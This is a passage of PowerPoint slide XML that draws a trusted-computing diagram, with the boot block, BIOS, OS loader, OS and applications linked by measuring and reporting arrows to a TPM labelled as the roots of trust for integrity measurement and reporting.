            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>boot </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>block</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Oval 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2432208"/>
            <a:ext cx="762000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>BIOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Oval 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2279808"/>
            <a:ext cx="914400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>loader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Oval 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2508408"/>
            <a:ext cx="609600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16391" name="Oval 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="2432208"/>
            <a:ext cx="1371600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16392" name="Oval 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="1213008"/>
            <a:ext cx="990600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ROMs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3956208"/>
            <a:ext cx="990600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="10196"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TPM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1289208"/>
            <a:ext cx="1219200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Oval 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="2432208"/>
            <a:ext cx="1066800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16396" name="Oval 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="1289208"/>
            <a:ext cx="1143000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Oval 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3346608"/>
            <a:ext cx="1676400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>New OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16398" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2737008"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16399" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2737008"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16400" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2737008"/>
            <a:ext cx="533400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16401" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2737008"/>
            <a:ext cx="533400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16402" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="3346608"/>
            <a:ext cx="1600200" cy="730250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Root of trust in integrity measurement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16403" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="4489608"/>
            <a:ext cx="1828800" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Root of trust in integrity reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16404" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2590800" y="1822608"/>
            <a:ext cx="457200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16405" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1905000" y="1746408"/>
            <a:ext cx="457200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16406" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3041808"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16407" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="4368958"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16408" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="4184808"/>
            <a:ext cx="1600200" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF66FF"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>measuring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16409" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="2737008"/>
            <a:ext cx="304800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16410" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="1746408"/>
            <a:ext cx="152400" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16411" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3505200" y="3041808"/>
            <a:ext cx="1676400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16412" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="4673758"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16413" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="4489608"/>
            <a:ext cx="1600200" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="66CCFF"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16414" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="3118008"/>
            <a:ext cx="1447800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16415" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3041808"/>
            <a:ext cx="304800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16416" name="Line 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2965608"/>
            <a:ext cx="533400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
